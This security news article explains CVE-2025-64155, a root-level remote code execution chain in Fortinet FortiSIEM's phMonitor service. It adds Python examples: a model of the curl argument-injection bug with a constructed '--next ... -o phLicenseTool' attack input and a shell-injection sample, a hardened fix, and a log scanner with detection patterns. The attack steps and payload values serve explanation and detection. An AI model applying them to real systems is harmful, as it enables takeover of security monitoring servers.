Guarding the Guardian: Horizon3 Unmasks Root RCE in Fortinet FortiSIEM
Security researchers at Horizon3 have published a detailed analysis of a critical vulnerability in Fortinet FortiSIEM, a widely deployed Security Information and Event Management (SIEM) platform that organizations use to monitor their infrastructure.
The vulnerability, tracked as CVE-2025-64155, lets an unauthenticated attacker execute arbitrary code on a FortiSIEM server and, through a follow-on privilege escalation, obtain full root access. The irony is that a system built to watch over the corporate network can itself be completely taken over.
The discovery began in August 2025, when Fortinet patched a different flaw in the same product. Horizon3's analysts set out to check whether that patch was sufficient and found a new attack path. It is the third significant flaw in the phMonitor service, the component that handles communication between FortiSIEM modules, after similar issues in 2023 and 2024.
Technically, the bug lies in how phMonitor accepts incoming requests and dispatches them to handlers without authenticating the sender. Developers had already closed an earlier command-injection hole by wrapping user-supplied data in single quotes, but quoting only neutralizes shell metacharacters; it does nothing to stop a value that curl itself interprets as a command-line option. The researchers used exactly that, argument injection into a curl invocation, to get around the fix.
The key is curl's --next option, which lets a single curl invocation carry several requests, each with its own options. By injecting --next followed by a second request whose response body is saved to a path of the attacker's choosing, an attacker can write arbitrary files anywhere on the server with the privileges of the administrative (non-root) account the service runs under. The researchers used this to overwrite phLicenseTool, a binary the system executes at short, regular intervals, and thereby gained initial code execution.
To reach root, the team looked at the cron scheduler and found that the redishb.sh script runs as root every minute but is writable by that same administrative user. Overwriting it gave them complete control of the system.
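To make the argument-injection point concrete, here is an added example, written for this article and not code from Horizon3 or Fortinet, that models a handler which quotes each untrusted value and splices it into a curl command line. The handler shape, the list-of-URLs field, the fixed output path and the target path for phLicenseTool are all assumptions for illustration; the real phMonitor handler is not shown on this page. The model shows that single quotes stop shell metacharacters but not a value that curl reads as an option, and how binding each value with --url plus a scheme check closes the hole.

```python
"""Argument injection vs. command injection in a curl-based handler.

Added example modelling the class of bug described above; the handler,
its fields and the paths are assumptions, not phMonitor's real code.
"""
import re
import shlex

# Trusted, fixed part of the command the hypothetical handler runs.
CURL_PREFIX = ["curl", "-s", "-o", "/var/tmp/mirror.bin"]
# Only plain http(s) URLs are acceptable as download targets.
URL_RE = re.compile(r"^https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s'\"]*)?$")


def single_quote(value: str) -> str:
    """Wrap a value in single quotes the way the earlier fix is described."""
    return "'" + value.replace("'", "'\\''") + "'"


def build_vulnerable(fields: list[str]) -> list[str]:
    """Quote every untrusted field and splice it into a shell string.

    Returns the argv the shell hands to curl after parsing the quotes,
    which is exactly what curl's own option parser then sees.
    """
    cmd = " ".join(CURL_PREFIX + [single_quote(f) for f in fields])
    return shlex.split(cmd)


def injected_options(argv: list[str]) -> list[str]:
    """Untrusted argv entries that curl will treat as options, not URLs."""
    return [a for a in argv[len(CURL_PREFIX):] if a.startswith("-")]


def build_hardened(fields: list[str]) -> list[str]:
    """Validate each field as an http(s) URL and bind it with --url.

    Because the value follows --url, curl never parses it as an option, and
    the argv list is meant for an exec-style call with no shell involved.
    """
    argv = list(CURL_PREFIX)
    for f in fields:
        if not URL_RE.match(f):
            raise ValueError("rejected field that is not an http(s) URL: %r" % f)
        argv += ["--url", f]
    return argv


def hardened_rejects(fields: list[str]) -> bool:
    """True if the hardened builder refuses the request."""
    try:
        build_hardened(fields)
    except ValueError:
        return True
    return False


# Constructed attacker input: a --next block with its own -o, so the second
# request's body lands at an arbitrary path (phLicenseTool here, as in the
# write-up; its directory is assumed).
ATTACK = [
    "http://203.0.113.7/first",
    "--next",
    "http://203.0.113.7/payload",
    "-o",
    "/opt/phoenix/bin/phLicenseTool",
]
# Classic command injection attempt, which the single quotes do neutralize.
SHELL_INJECT = ["http://203.0.113.7/x; id > /tmp/pwned"]
BENIGN = ["https://mirror.example/fw.bin"]

if __name__ == "__main__":
    print("vulnerable argv:", build_vulnerable(ATTACK))
    print("options curl will honour:", injected_options(build_vulnerable(ATTACK)))
    print("shell metachars kept inert:", build_vulnerable(SHELL_INJECT)[-1])
    print("hardened rejects attack:", hardened_rejects(ATTACK))
    print("hardened argv:", build_hardened(BENIGN))
```

The lesson carries beyond curl: any time untrusted data becomes a separate argv entry for a tool that parses options, quoting for the shell is irrelevant, and the fix is to validate the value and pass it in a position the tool cannot misread.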
The stakes are underlined by chat logs leaked from the Black Basta ransomware group in early 2025, which showed a specific interest in FortiSIEM vulnerabilities. Flaws in defensive software are clearly prized by sophisticated criminal groups.
Disclosure took a long time. Horizon3 reported the vulnerability to Fortinet on August 14, 2025. When the usual 90-day coordinated-disclosure window ran out, four of the five product branches had been fixed but one was still vulnerable. Public disclosure was therefore postponed until January 13, 2026, 152 days after the initial report.
Administrators running FortiSIEM should apply the latest security updates immediately. To look for signs of compromise, review phoenix.logs for PHL_ERROR entries that contain unexpected URLs or unusual file paths. With a proof-of-concept exploit already public on GitHub, patching cannot wait.
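As an added example of the log review suggested above, and not code from the article, Horizon3 or Fortinet, the following scans phoenix.logs-style lines for PHL_ERROR entries that mention a host outside an allow-list, contain curl option tokens, or reference a path under a sensitive directory. The line format, the allow-list, the directory list and the sample lines are constructed for illustration; adjust them to the real log format and your environment.

```python
"""Scan phoenix.logs-style lines for suspicious PHL_ERROR entries.

Added example; the line format, allow-list, directory list and sample lines
are constructed for illustration, not taken from a real FortiSIEM host.
"""
import re

# Hosts this SIEM is expected to fetch from (assumed; fill in per site).
ALLOWED_HOSTS = {"update.fortinet.example", "127.0.0.1", "localhost"}
# Locations a write-anywhere primitive would target (assumed paths).
SENSITIVE_DIRS = ("/opt/phoenix/bin", "/etc/cron.d", "/etc/cron.hourly",
                  "/var/spool/cron", "/root")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?::\d+)?[^\s'\"]*")
# curl option tokens that should never appear inside a URL field.
OPTION_RE = re.compile(r"(?:^|\s)(--next|--output|-o)(?=\s|$)")
PATH_RE = re.compile(r"/[\w./-]+")


def is_sensitive(path: str) -> bool:
    """True if path is, or sits under, one of the sensitive directories."""
    return any(path == d or path.startswith(d + "/") for d in SENSITIVE_DIRS)


def scan_phoenix_log(lines):
    """Return [(line_no, [reasons])] for PHL_ERROR lines worth a second look."""
    hits = []
    for no, line in enumerate(lines, 1):
        if "PHL_ERROR" not in line:
            continue
        reasons = []
        # findall returns the captured host for every URL on the line.
        for host in sorted(set(URL_RE.findall(line))):
            if host not in ALLOWED_HOSTS:
                reasons.append("external-url:" + host)
        if OPTION_RE.search(line):
            reasons.append("curl-option")
        # Strip URLs first so their path parts are not mistaken for local paths.
        for path in PATH_RE.findall(URL_RE.sub(" ", line)):
            if is_sensitive(path):
                reasons.append("sensitive-path:" + path)
        if reasons:
            hits.append((no, reasons))
    return hits


# Constructed sample lines (not real phoenix.logs output).
SAMPLE_LOG = """\
2026-01-14 10:02:11 PHL_INFO phMonitor: handler dispatched
2026-01-14 10:02:12 PHL_ERROR phMonitor: curl failed url=https://update.fortinet.example/pkg.tgz rc=7
2026-01-14 10:03:40 PHL_ERROR phMonitor: curl failed url=http://203.0.113.7/a --next http://203.0.113.7/b -o /opt/phoenix/bin/phLicenseTool rc=22
2026-01-14 10:04:05 PHL_ERROR phMonitor: write to /root/.ssh/authorized_keys failed rc=1
"""

if __name__ == "__main__":
    for no, reasons in scan_phoenix_log(SAMPLE_LOG.splitlines()):
        print(no, ", ".join(reasons))
```

Run it over the real file with `scan_phoenix_log(open("/path/to/phoenix.logs"))`; a hit is a prompt for investigation, not proof of compromise, since a legitimate but misconfigured fetch can also fail against an unfamiliar host.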